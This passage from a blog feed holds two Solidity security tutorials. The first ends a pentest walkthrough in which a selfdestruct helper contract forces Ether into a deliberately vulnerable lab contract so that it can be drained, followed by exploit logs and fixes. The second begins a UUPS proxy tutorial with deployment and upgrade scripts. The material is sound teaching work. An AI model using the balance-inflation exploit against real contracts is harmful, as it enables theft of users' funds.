console.log(&quot;Balance of tower: &quot;, address(tower).balance / 1 ether);

```

To trigger the **`claimTreasure()`** function, we need to be registered as an adventurer. To do this, we make a legitimate deposit of 0.01 ETH using the **`depositGold()`** function.

-   This small deposit ensures that our address is added to the **adventurers** mapping, making us eligible to claim rewards.
-   We log the current balance of the **CrystalTowerTreasure** contract. The exact balance is now 15.01 ETH (10 ETH from the owner’s initial deposit, 5 ETH injected via **`selfdestruct`**, and our 0.01 ETH deposit); the log prints 15 only because of the integer division by `1 ether`. Crucially, the balance now exceeds the 15 ETH threshold.

### **Draining the Contract with `claimTreasure()`**

```solidity
tower.claimTreasure();
console.log(&quot;Attack finished balance: &quot;, attacker.balance / 1 ether);

```

Now comes the final step:

-   We call the **`claimTreasure()`** function, which checks the contract’s total balance (15.01 ETH) and determines that it should transfer the entire balance to us.
-   Since the balance exceeds the 15 ETH threshold (the check is a strict `contractBalance &gt; 15 ether`), the contract transfers **all its Ether** to the attacker.

We log the attacker’s final balance, which now includes all the Ether from the contract.

### **Helper Contract: GrimoireOfDestruction**

```solidity
pragma solidity ^0.8.0;

contract GrimoireOfDestruction {
    constructor() payable {}

    function castDestructionSpell(address payable crystalTower) public {
        selfdestruct(crystalTower);
    }
}

```

This contract is the key to bypassing the **0.02 ETH limit**. When we call **`castDestructionSpell()`**, it executes **`selfdestruct(crystalTower)`**, instantly transferring its 5 ETH directly into the balance of the vulnerable contract. Note that even after EIP-6780, this Ether transfer still happens (only the code and storage deletion is restricted), so the attack remains viable on post-Cancun chains. Because the victim contract doesn’t check the source of its balance, it treats the injected Ether as legitimate.

# **Proof of Exploit: Taking Control of the Contract Balance**

As you can see from the image, we’ve successfully executed the **GrimoireOfDestruction** payload to bypass the 0.02 ETH limit and trick the vulnerable contract into giving us all its funds. Now that we understand how the exploit works, let’s break down the key details shown in the logs and explain why this attack was successful.

```bash
forge script script/Exploit.sol --broadcast

```

![](/content/images/2025/02/image.png)

Successful Attack

The initial setup starts with the vulnerable **CrystalTowerTreasure** contract already holding the owner’s 10 ETH deposit, and the attacker’s account funded and ready to carry out the exploit. The **GrimoireOfDestruction** contract is then deployed and funded with 5 ETH, an amount that will play a key role in inflating the vulnerable contract’s balance.

Once deployed, the **selfdestruct** operation is triggered within the **GrimoireOfDestruction** contract. This action sends the 5 ETH directly into the **CrystalTowerTreasure** contract, completely bypassing its deposit mechanism and any restrictions it enforces on legitimate deposits.

With the contract balance inflated, the attacker proceeds to make a small, legitimate deposit of 0.01 ETH through the **depositGold** function. This small deposit ensures that the attacker is registered as an adventurer in the contract’s internal mapping. The real magic happens when the attacker calls **claimTreasure()**. Since the contract blindly trusts its external balance without verifying the legitimacy of the funds, it calculates the withdrawal amount based on the total balance, including the 5 ETH injected via **selfdestruct**.

As shown in the logs, the attacker’s balance ends at **10,010 ETH**. The numbers add up: starting from the default 10,000 ETH test-account balance, the attacker spent 5.01 ETH (5 ETH to fund the Grimoire plus the 0.01 ETH deposit) and received the contract’s full 15.01 ETH, netting roughly 10 ETH of stolen funds (ignoring gas). The vulnerability lies in the contract’s reliance on its external balance without validating the origin of those funds, making it an easy target for this exploit.

# **Fixing the Vulnerability: How to Protect the Treasure from Selfdestruct Attacks**

## Track Internal Deposits Only

We’ve successfully exploited the **CrystalTowerTreasure** contract, but the goal of any pentest is to learn and improve security. So, how do we prevent this type of attack? The key is understanding the vulnerability: the contract blindly trusts its external Ether balance, allowing attackers to manipulate it via **`selfdestruct`**. To fix this, we need to ensure that **only legitimate deposits are counted** when determining how much Ether can be withdrawn. Let’s explore how to do that.

Instead of relying on the contract’s **external balance** (`address(this).balance`), we should maintain an **internal balance that is updated only through legitimate deposits**. This ensures that even if an attacker injects Ether using **`selfdestruct`**, it won’t affect the internal accounting logic.

Here’s how you can modify the contract:

```solidity
function claimTreasure() public {
    Adventurer storage adventurer = adventurers[msg.sender];
    require(adventurer.deposit &gt; 0, &quot;No treasure to claim.&quot;);
    require(!adventurer.hasWithdrawn, &quot;Rewards already claimed.&quot;);

    uint256 amountToTransfer = adventurer.deposit; // Only transfer what was legitimately deposited.

    // Mark the adventurer as having withdrawn and update the internal balance
    adventurer.hasWithdrawn = true;
    totalDeposits -= adventurer.deposit;

    payable(msg.sender).transfer(amountToTransfer);
}

```

**What’s different here?**  
We no longer rely on the contract’s **external balance**. Instead, we only allow users to withdraw their **tracked deposits**, ensuring that the **`selfdestruct`\-injected Ether is ignored**.

## **Disable External Ether Transfers**

To further harden the contract, you can reject plain Ether transfers by making the `receive` and `fallback` functions revert. This stops accidental or direct `send`/`transfer` injections, though it is not a complete defense on its own.

```solidity
// Reject direct Ether transfers that bypass deposit logic
receive() external payable {
    revert(&quot;Direct Ether transfers are not allowed.&quot;);
}

fallback() external payable {
    revert(&quot;Invalid function call.&quot;);
}

```

Keep in mind an important caveat: **`selfdestruct`** transfers do **not** trigger `receive` or `fallback`, so they cannot be blocked this way (the same is true for Ether sent to the address as a block reward, or pre-funded before deployment). Reverting on direct transfers only closes the accidental-funding path; the internal accounting fix described above remains the real defense.

## Consider Upgrading to OpenZeppelin’s Payment Solutions

If the contract involves more complex scenarios (e.g., reward pools, staking), consider battle-tested withdrawal utilities such as **OpenZeppelin’s PaymentSplitter** or **PullPayment** (available in the 4.x releases of OpenZeppelin Contracts; both were removed in 5.0). These helpers manage fund withdrawals securely while preventing common pitfalls, including those involving external balance manipulation.
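
As a rough illustration of the pull-payment idea (a simplified sketch, not OpenZeppelin’s actual implementation), the contract only ever pays out internally tracked credits:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Simplified pull-payment sketch: payouts are credited internally
// and pulled by the recipient, never pushed by the contract.
contract PullPaymentSketch {
    mapping(address =&gt; uint256) private credits;

    // Credit a payee; the Ether stays escrowed in this contract.
    function deposit(address payee) external payable {
        require(msg.value &gt; 0, &quot;Nothing to credit.&quot;);
        credits[payee] += msg.value;
    }

    // The payee withdraws only what was explicitly credited, so Ether
    // injected via selfdestruct is never withdrawable by anyone.
    function withdraw() external {
        uint256 amount = credits[msg.sender];
        require(amount &gt; 0, &quot;No credits.&quot;);
        credits[msg.sender] = 0; // zero before transfer (checks-effects-interactions)
        payable(msg.sender).transfer(amount);
    }
}
```

Because withdrawals are bounded by the `credits` mapping rather than `address(this).balance`, inflating the contract’s balance buys an attacker nothing.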

# **Conclusions: Lessons Learned from Cracking (and Fixing) the Treasure Chest**

Congratulations, fellow adventurer! 🎉 You’ve successfully navigated through the depths of Ethereum’s **selfdestruct** mechanics, unraveled a clever vulnerability, and drained a contract like a true pentesting legend. But before you pack up your gear and sail off into the sunset, let’s pause to reflect on the key takeaways.

🔑 **1\. The Power of Unexpected Ether**  
As we’ve seen, the ability to inject Ether into a contract using **selfdestruct** isn’t just a theoretical problem—it’s a real-world weakness lurking in many smart contracts. If a contract blindly trusts its external balance, attackers can easily exploit this trust to bypass restrictions, manipulate logic, and drain funds. The lesson here? **Always validate where funds come from.**

💣 **2\. Small Vulnerabilities Lead to Big Exploits**  
A deposit limit of 0.02 ETH may sound like a robust control, but **assumptions kill security.** In this case, the developers assumed that deposits would only come through their carefully guarded deposit function. But all it took was a small helper contract with **selfdestruct** to bypass that restriction and trigger a financial meltdown. When designing smart contracts, remember: **think like an attacker.** What you assume to be safe might just be their entry point.

🛡 **3\. Fixing Isn’t Optional—it’s Essential**  
We didn’t just break this contract for fun (although, let’s be honest, it was fun 😄). The true value of pentesting lies in improving security. By tracking **internal deposits only** and rejecting **unexpected Ether**, we’ve shown how developers can patch this exploit and protect their treasure chests from unwanted looters.

🚫 **4\. Know When to Say “No” to Ether**  
The most direct fix? Don’t accept funds from unknown sources. Implementing fallback and receive functions that reject any direct Ether transfers helps close this backdoor and keeps your contract’s balance clean and safe.

👷 **5\. Security is a Continuous Journey**  
The Ethereum world evolves quickly, and so do the threats. The **selfdestruct** mechanism may have been partially neutered with the Cancun hard fork, but similar exploits will continue to emerge. As a developer or pentester, you must **stay vigilant**. Always question how funds are handled, and **never trust blindly.**

✨ **Final Thoughts**  
In the end, this journey wasn’t just about exploiting a smart contract; it was about understanding how tiny assumptions can lead to massive exploits—and how, with a little creativity, they can be patched. Whether you’re a pentester uncovering vulnerabilities or a developer securing your contracts, this adventure highlights one crucial truth:

**Security isn’t a feature—it’s a process.** And now, you’re a part of it. 👾💡

# References

-   **Solidity Documentation**. &quot;Deactivate and Self-destruct.&quot; Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#deactivate-and-self-destruct](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#deactivate-and-self-destruct)
-   **SolidityScan Blog**. &quot;Security Implications of selfdestruct() in Solidity — Part 1.&quot; Available at: [https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-1-3d40e24a48d8](https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-1-3d40e24a48d8)
-   **SolidityScan Blog**. &quot;Security Implications of selfdestruct() in Solidity — Part 2.&quot; Available at: [https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-2-371b0a0b6ede](https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-2-371b0a0b6ede)
-   **Ethereum Improvement Proposals**. &quot;EIP-6780: SELFDESTRUCT only in same transaction.&quot; Available at: [https://eips.ethereum.org/EIPS/eip-6780](https://eips.ethereum.org/EIPS/eip-6780)
-   **Ethereum Improvement Proposals**. &quot;EIP-6049: Deprecate SELFDESTRUCT.&quot; Available at: [https://eips.ethereum.org/EIPS/eip-6049](https://eips.ethereum.org/EIPS/eip-6049)
-   **OpenZeppelin Documentation**. &quot;Writing Upgradeable Contracts.&quot; Available at: [https://docs.openzeppelin.com/upgrades-plugins/writing-upgradeable](https://docs.openzeppelin.com/upgrades-plugins/writing-upgradeable)</content:encoded><author>Ruben Santos</author></item><item><title>UUPS Proxies: A Double-Edged Sword – Efficient Upgrades, Hidden Risks</title><link>https://www.kayssel.com/post/web3-12</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-12</guid><description>In this chapter, we explore UUPS Proxies, their efficiency, and security trade-offs compared to Transparent Proxies. We break down their architecture, deployment, and common vulnerabilities. We also examine Beacon, Minimal, and Diamond Proxies, analyzing their risks and real-world use cases. 🚀</description><pubDate>Sun, 02 Feb 2025 09:52:06 GMT</pubDate><content:encoded># **Introduction**

Welcome back! In the previous chapter, [we explored **Transparent Proxies**](https://www.kayssel.com/post/web3-11/), the classic method for upgrading smart contracts while keeping the same address. We saw how they work, why they’re useful, and, of course, how they can be completely **wrecked** if left unprotected. But just when you thought you had proxies figured out, here comes another player—**UUPS Proxies**.

UUPS (Universal Upgradeable Proxy Standard) proxies take a **leaner, more efficient approach**. Instead of making the **proxy contract** handle upgrades (like in Transparent Proxies), **UUPS shifts that responsibility to the implementation contract itself**. This cuts down the proxy’s complexity, reduces gas costs, and keeps things **lightweight**. However, **this also means that security must be airtight**, because any mistakes in the implementation contract could leave your system completely exposed.

In this chapter, we’ll **break down how UUPS Proxies work**, compare them to Transparent Proxies, and—because we know bad things happen—we’ll also explore **what can go wrong and how to protect against it**. You’ll also get **hands-on** with an implementation, see an upgrade in action, and, by the end, have a clear understanding of **why UUPS proxies have become the preferred choice for many developers**.

But UUPS isn’t the **only** alternative to Transparent Proxies. As we progress, we’ll also **look at other proxy patterns** that pop up in the blockchain world, like **Beacon Proxies, Minimal Proxies (Clones), Diamond Proxies, and Static Proxies**. Each has its own use case, strengths, and, of course, **potential pitfalls**.

So, if you’re ready to level up your proxy knowledge—and avoid catastrophic upgrade failures—let’s get started. 🚀

# UUPS Proxies: What Are They?

**UUPS proxies** (Universal Upgradeable Proxy Standard) are a type of proxy used in Ethereum smart contracts to enable upgrades. Unlike Transparent Proxies, where the upgrade logic is managed by the proxy itself, UUPS proxies shift that responsibility to the **implementation contract**.

This design makes UUPS proxies simpler and more gas-efficient because the proxy only focuses on forwarding calls, while the implementation contract handles upgrades when needed. Essentially, the proxy acts as a pass-through, and the implementation contains the logic for both the contract’s functionality and its upgrade process.

In short, UUPS proxies allow you to:

-   **Upgrade contract logic** while keeping the same address.
-   **Save gas** by reducing the size and complexity of the proxy.
-   Keep the system flexible while maintaining functionality.

It’s a cleaner, more efficient way to handle upgrades in the blockchain world, but the shift of upgrade logic to the implementation also means extra care is needed to secure it.
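
To make that shift of responsibility concrete, here is a bare-bones sketch of an implementation contract carrying its own upgrade logic (hypothetical names, `owner` initialization omitted for brevity; a production contract would use OpenZeppelin’s `UUPSUpgradeable` instead of rolling this by hand):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Sketch: in UUPS the upgrade function lives in the implementation
// and runs in the proxy&apos;s storage context via delegatecall.
contract LogicV1 {
    // Same EIP-1967 slot the proxy reads the implementation from.
    bytes32 private constant IMPLEMENTATION_SLOT =
        bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

    address public owner;
    uint256 public value;

    function setValue(uint256 newValue) external {
        value = newValue;
    }

    // Without this access check, ANYONE could repoint the proxy.
    function upgradeTo(address newImplementation) external {
        require(msg.sender == owner, &quot;Not authorized&quot;);
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }
}
```

Notice that if a new implementation ships without `upgradeTo` (or with a broken guard), the proxy becomes permanently frozen or permanently hijackable, which is exactly the class of failure we’ll dig into.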

# Breaking Down the Proxy Code

Let’s speed through the proxy implementation—after all, this is practically the same setup we used in the [Transparent Proxy](https://www.kayssel.com/post/web3-11/) from the last chapter. If you’ve read that section, you’re already 90% of the way there. But let’s refresh the key pieces and point out what makes this proxy tick.

&lt;details&gt;
&lt;summary&gt;UUPS Proxy&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract UUPSProxy {
    // Storage slot for the implementation address (EIP-1967-compliant)
    bytes32 private constant IMPLEMENTATION_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

    // Storage slot for the admin address (EIP-1967-compliant)
    bytes32 private constant ADMIN_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);


    // Constructor to initialize the implementation and admin
    constructor(address initialImplementation, address adminAddress) {
        require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
        require(adminAddress != address(0), &quot;Admin cannot be zero address&quot;);

        _setImplementation(initialImplementation);
        _setAdmin(adminAddress);
    }

    // Fallback function to delegate all calls to the implementation
    fallback() external payable {
        _delegate();
    }

    receive() external payable {
        _delegate();
    }

    // Internal function to delegate the call to the implementation contract
    function _delegate() internal {
        address impl = _getImplementation();
        require(impl != address(0), &quot;Implementation not set&quot;);

        assembly {
            // Copy calldata
            calldatacopy(0, 0, calldatasize())

            // Delegatecall to the implementation
            let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

            // Copy returndata
            returndatacopy(0, 0, returndatasize())

            // Revert or return based on the result
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Internal function to retrieve the implementation address
    function _getImplementation() internal view returns (address impl) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            impl := sload(slot)
        }
    }

    // Internal function to set the implementation address
    function _setImplementation(address newImplementation) internal {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }

    // Internal function to retrieve the admin address
    function _getAdmin() internal view returns (address adm) {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            adm := sload(slot)
        }
    }

    // Internal function to set the admin address
    function _setAdmin(address newAdmin) internal {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            sstore(slot, newAdmin)
        }
    }
}

```
&lt;/details&gt;


#### **1\. Storage Slots: The Foundation**

Just like in the Transparent Proxy, we’re working with two storage slots defined by the EIP-1967 standard:

-   **`IMPLEMENTATION_SLOT`**: Holds the address of the contract with the logic (the implementation).
-   **`ADMIN_SLOT`**: Stores the address of the admin who’s allowed to upgrade the implementation.

Here’s how they’re defined:

```solidity
bytes32 private constant IMPLEMENTATION_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);
bytes32 private constant ADMIN_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);

```

The reason for EIP-1967 is simple: it ensures these slots won’t overlap with the variables in your implementation contract. If the Transparent Proxy was your intro to this concept, then this is just a quick reminder—it’s the same approach.
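
In practice, production proxies (OpenZeppelin's, for instance) hardcode the precomputed hashes instead of recomputing them in the initializer; as a reference sketch, these are the well-known EIP-1967 constants:

```solidity
// Precomputed EIP-1967 slots, i.e. bytes32(uint256(keccak256(label)) - 1)
bytes32 private constant IMPLEMENTATION_SLOT =
    0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
bytes32 private constant ADMIN_SLOT =
    0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103;
```

Both forms produce the same slots; the hardcoded version just makes the values auditable at a glance.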

#### **2\. Constructor: Setting Up the Proxy**

When deploying the proxy, we initialize the implementation and admin addresses in the constructor:

```solidity
constructor(address initialImplementation, address adminAddress) {
    require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
    require(adminAddress != address(0), &quot;Admin cannot be zero address&quot;);

    _setImplementation(initialImplementation);
    _setAdmin(adminAddress);
}

```

This is straightforward:

1.  Validate the addresses.
2.  Store them in their respective storage slots.

#### **3\. Fallback and Receive: Delegating Calls**

As with the Transparent Proxy, the `fallback` and `receive` functions handle all incoming calls and forward them to the implementation contract:

```solidity
fallback() external payable {
    _delegate();
}

receive() external payable {
    _delegate();
}

```

These functions make the proxy a middleman, passing along requests without ever executing them itself. The real work happens in `_delegate`.

#### **4\. The `_delegate` Function: Forwarding the Action**

Here’s where the magic happens. The `_delegate` function forwards calls to the implementation, just like in the Transparent Proxy:

```solidity
function _delegate() internal {
    address impl = _getImplementation();
    require(impl != address(0), &quot;Implementation not set&quot;);

    assembly {
        calldatacopy(0, 0, calldatasize())
        let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
        returndatacopy(0, 0, returndatasize())

        switch result
        case 0 { revert(0, returndatasize()) }
        default { return(0, returndatasize()) }
    }
}

```

This function:

1.  Retrieves the implementation address from `IMPLEMENTATION_SLOT`.
2.  Uses `delegatecall` to execute the function in the implementation’s context.
3.  Returns the result or reverts if something goes wrong.

#### **5\. Internal Helpers: Managing the Slots**

We’re reusing the same helper functions for reading and writing to the storage slots:

```solidity
function _getImplementation() internal view returns (address impl) {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        impl := sload(slot)
    }
}

function _setImplementation(address newImplementation) internal {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        sstore(slot, newImplementation)
    }
}

function _getAdmin() internal view returns (address adm) {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        adm := sload(slot)
    }
}

function _setAdmin(address newAdmin) internal {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        sstore(slot, newAdmin)
    }
}

```

# Breaking Down the Implementation Contract

Now that we’ve covered the proxy, it’s time to dive into **ImplementationV1**, where the real magic happens. This contract not only contains the application’s logic but also the critical **upgrade mechanism** that makes this a true UUPS Proxy system. Let’s break it down step by step.

&lt;details&gt;
&lt;summary&gt;Implementation&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract ImplementationV1 {
    event UpgradeAttempt(address sender, address newImplementation);
    event AdminCheck(address sender, address admin);
    event DebugMessage(string message);
    event DebugMessageAddress(string message, address value);

    uint256 public storedValue;


    function upgradeTo(address newImplementation) external {
        emit DebugMessage(&quot;Entered upgradeTo&quot;);
        emit UpgradeAttempt(msg.sender, newImplementation);

        address admin = _getAdmin();
        emit AdminCheck(msg.sender, admin);

        require(admin == msg.sender, &quot;Not authorized&quot;);
        emit DebugMessage(&quot;Admin check passed&quot;);

        require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);
        emit DebugMessage(&quot;New implementation address valid&quot;);

        // Use the EIP-1967 implementation slot
        bytes32 implementationSlot = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

        // Log current implementation for debugging
        address currentImplementation;
        assembly {
            currentImplementation := sload(implementationSlot)
        }
        emit DebugMessageAddress(&quot;Current implementation&quot;, currentImplementation);

        // Update the implementation slot
        assembly {
            sstore(implementationSlot, newImplementation)
        }
        emit DebugMessage(&quot;Implementation updated successfully&quot;);
    }

    function getVersion() public pure returns (string memory) {
        return &quot;v1&quot;;
    }

    function setStoredValue(uint256 value) public {
        storedValue = value;
    }

    function getStoredValue() public view returns (uint256) {
        return storedValue;
    }

    function _getAdmin() internal view returns (address) {
        bytes32 slot = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);
        address adm;
        assembly {
            adm := sload(slot)
        }
        return adm;
    }
    
}

```
&lt;/details&gt;


#### **1\. Upgrade Mechanism: The `upgradeTo` Function**

At the heart of this implementation is the `upgradeTo` function, which allows the admin to update the proxy’s implementation address. This is what sets UUPS apart from Transparent Proxies—the implementation itself manages the upgrades.

Here’s the code:

```solidity
function upgradeTo(address newImplementation) external {
    emit DebugMessage(&quot;Entered upgradeTo&quot;);
    emit UpgradeAttempt(msg.sender, newImplementation);

    address admin = _getAdmin();
    emit AdminCheck(msg.sender, admin);

    require(admin == msg.sender, &quot;Not authorized&quot;);
    emit DebugMessage(&quot;Admin check passed&quot;);

    require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);
    emit DebugMessage(&quot;New implementation address valid&quot;);

    // Use the EIP-1967 implementation slot
    bytes32 implementationSlot = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

    // Log current implementation for debugging
    address currentImplementation;
    assembly {
        currentImplementation := sload(implementationSlot)
    }
    emit DebugMessageAddress(&quot;Current implementation&quot;, currentImplementation);

    // Update the implementation slot
    assembly {
        sstore(implementationSlot, newImplementation)
    }
    emit DebugMessage(&quot;Implementation updated successfully&quot;);
}

```

### What’s Happening Here?

1.  **Authorization Check:**  
    The function ensures only the admin (stored in the proxy’s `ADMIN_SLOT`) can perform the upgrade. If the caller isn’t the admin, the call fails with a `Not authorized` error.
2.  **Validation:**  
    It checks that the `newImplementation` address is valid (not `address(0)`).
3.  **Update the Implementation Slot:**  
    Using low-level assembly, the function updates the `IMPLEMENTATION_SLOT` in the proxy’s storage. This ensures the proxy delegates future calls to the new implementation.
4.  **Debugging Events:**  
    The function emits several events, such as the current and new implementation addresses, to make it easier to debug during upgrades.

This mechanism ensures that the upgrade process is both flexible and secure, as long as the admin address is properly managed.
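
One hardening worth noting here, as a sketch rather than part of the contract above: production UUPS implementations such as OpenZeppelin's `UUPSUpgradeable` add a guard so that `upgradeTo` reverts when called directly on the implementation instead of through the proxy. The trick is that under `delegatecall`, `address(this)` is the proxy, not the implementation:

```solidity
// Captured at deployment: the implementation's own address.
address private immutable __self = address(this);

modifier onlyProxy() {
    // Through the proxy (delegatecall), address(this) is the proxy address,
    // so this check passes; a direct call on the implementation reverts.
    require(address(this) != __self, &quot;Must be called through the proxy&quot;);
    _;
}
```

Attaching `onlyProxy` to `upgradeTo` closes off a whole class of direct-call attacks we'll revisit in the vulnerabilities section.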

#### **2\. Versioning: The `getVersion` Function**

To make upgrades transparent, the contract includes a simple versioning mechanism:

```solidity
function getVersion() public pure returns (string memory) {
    return &quot;v1&quot;;
}

```

This is useful for verifying which implementation the proxy is currently using. After an upgrade, calling `getVersion` through the proxy lets you confirm that the new implementation is in place.

#### **3\. Core Logic: Business Functions**

The contract also includes application-specific logic. In this case, we have two simple functions for storing and retrieving a value:

```solidity
function setStoredValue(uint256 value) public {
    storedValue = value;
}

function getStoredValue() public view returns (uint256) {
    return storedValue;
}

```

### How Does It Work?

1.  **`setStoredValue`:** Stores a value in the proxy’s storage. Remember, thanks to `delegatecall`, the state is stored in the proxy, not the implementation.
2.  **`getStoredValue`:** Retrieves the stored value, allowing users to confirm that the proxy’s state is preserved across upgrades.

#### **4\. Admin Retrieval: The `_getAdmin` Function**

To securely retrieve the admin address, the contract includes an internal helper function:

```solidity
function _getAdmin() internal view returns (address) {
    bytes32 slot = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);
    address adm;
    assembly {
        adm := sload(slot)
    }
    return adm;
}

```

-   The admin address is stored in the proxy’s `ADMIN_SLOT`, and this function allows the implementation to read it safely.
-   Without this, the implementation wouldn’t know who is authorized to perform upgrades.

# Deploying the UUPS Proxy and Implementation

The deployment process for the UUPS Proxy and its implementation is managed using a simple Foundry script. The script handles everything from deploying the contracts to setting up the proxy and its admin. Let’s walk through how it works.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../../src/UUPS-Proxy/UUPS-Proxy.sol&quot;;
import &quot;../../src/UUPS-Proxy/ImplementationUUPS.sol&quot;;

contract Deploy is Script {
    function run() external {
        // Start broadcasting transactions
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Step 1: Deploy the ImplementationV1 contract
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationV1 deployed at:&quot;, address(implementation));

        // Step 2: Deploy the UUPS Proxy contract
        UUPSProxy proxy = new UUPSProxy(address(implementation), vm.envAddress(&quot;ADMIN_ADDR&quot;));
        console.log(&quot;UUPSProxy deployed at:&quot;, address(proxy));

        // End broadcasting transactions
        vm.stopBroadcast();
    }
}

```

The deployment begins with the `run` function, which starts broadcasting transactions. This ensures that all subsequent actions, like contract deployments, are signed and sent to the blockchain using the admin’s private key. The admin key is securely provided via environment variables, keeping sensitive information safe.

The first step in the deployment is to deploy the implementation contract. In this case, it’s `ImplementationV1`, which contains all the core logic and the `upgradeTo` function for future upgrades. Once deployed, the address of the implementation contract is logged for reference. This address is essential, as it will be used to link the proxy to the implementation.

Next, the UUPS Proxy is deployed. The proxy is initialized with the address of the implementation contract and the admin’s address. The admin address, also passed through environment variables, is stored in the proxy to grant the admin control over future upgrades. The address of the proxy is logged, as it will serve as the permanent entry point for interacting with the system. All user interactions with the smart contract will go through this proxy, even as the underlying implementation changes over time.

Finally, the script stops broadcasting transactions. This ensures that no unintended actions are sent to the blockchain beyond the deployments. At this point, both the proxy and the implementation contracts are deployed and linked, and the system is ready to use.

To execute this script, you simply run it with Foundry, specifying the local Anvil testnet or any desired blockchain environment. Once the script completes, the deployment is finalized, and the addresses of the proxy and implementation are logged, ensuring everything is in place for interaction or further testing.
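
Concretely, the invocation looks roughly like the following (the script path is illustrative, and the `0x...` values are placeholders for your own key and address):

```bash
# Export the values the script reads via vm.envUint / vm.envAddress
export ADMIN_KEY=0x...    # private key of the admin account
export ADMIN_ADDR=0x...   # address that will control upgrades

# Run the deployment against a local Anvil node
forge script script/UUPS-Proxy/Deploy.s.sol:Deploy \
    --rpc-url http://127.0.0.1:8545 \
    --broadcast
```

Dropping `--broadcast` performs a dry run, which is a cheap way to sanity-check the script before sending real transactions.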

This deployment script sets up a clean foundation for the UUPS Proxy system. With the proxy now in place, users can interact with the contract seamlessly while the admin retains the flexibility to upgrade the implementation when needed. The result is a dynamic and upgradeable system, ready for action.

![](/content/images/2025/01/image-12.png)

Running the deployment script

# Interacting with and Upgrading the Proxy

Now that we’ve deployed the UUPS Proxy and its first implementation, it’s time to interact with it and see the magic of seamless upgrades in action. This script demonstrates how to use the proxy to store a value, verify the implementation version, and even upgrade to a new implementation—all while keeping the same proxy address. Let’s break it down.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;

interface IUUPSProxy {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract Interact is Script {
    IUUPSProxy proxy = IUUPSProxy(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));
        proxy.setStoredValue(150);
        console.log(&quot;Version: &quot;, proxy.getVersion());
        proxy.upgradeTo(0xDc64a140Aa3E981100a9becA4E685f962f0cF6C9);
        console.log(&quot;Version: &quot;, proxy.getVersion());
        console.log(&quot;The value is: &quot;, proxy.getStoredValue());
        vm.stopBroadcast();
    }
}

```

#### **1\. Setting Up the Script**

The script starts by importing Foundry’s scripting utilities and defining an interface, `IUUPSProxy`. This interface allows us to interact with the proxy’s key functions, such as storing and retrieving values, checking the implementation version, and upgrading the implementation.

&lt;details&gt;
&lt;summary&gt;The script references a deployed proxy by its address:&lt;/summary&gt;

```solidity
IUUPSProxy proxy = IUUPSProxy(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

```
&lt;/details&gt;


This hardcoded address (`0xe7f...`) is the proxy’s address from deployment. All interactions, including the upgrade, will be routed through this proxy.

#### **2\. Starting Transactions**

As with the deployment script, the first step is to start broadcasting transactions:

```solidity
vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

```

This ensures all actions in the script are signed with the admin’s private key (`ADMIN_KEY`) provided via environment variables. Since we’re about to call functions that require admin permissions, this step is critical.

#### **3\. Interacting with the Proxy**

The script first demonstrates how to use the proxy to store and retrieve values.

```solidity
proxy.setStoredValue(150);
console.log(&quot;Version: &quot;, proxy.getVersion());

```

Here’s what happens:

-   **`setStoredValue(150)`**: Calls the `setStoredValue` function in the implementation via the proxy. The value `150` is stored in the proxy’s storage (not the implementation’s).
-   **`getVersion()`**: Calls the `getVersion` function to check the version of the current implementation. Initially, this should return `&quot;v1&quot;` (or whatever the first implementation specifies).

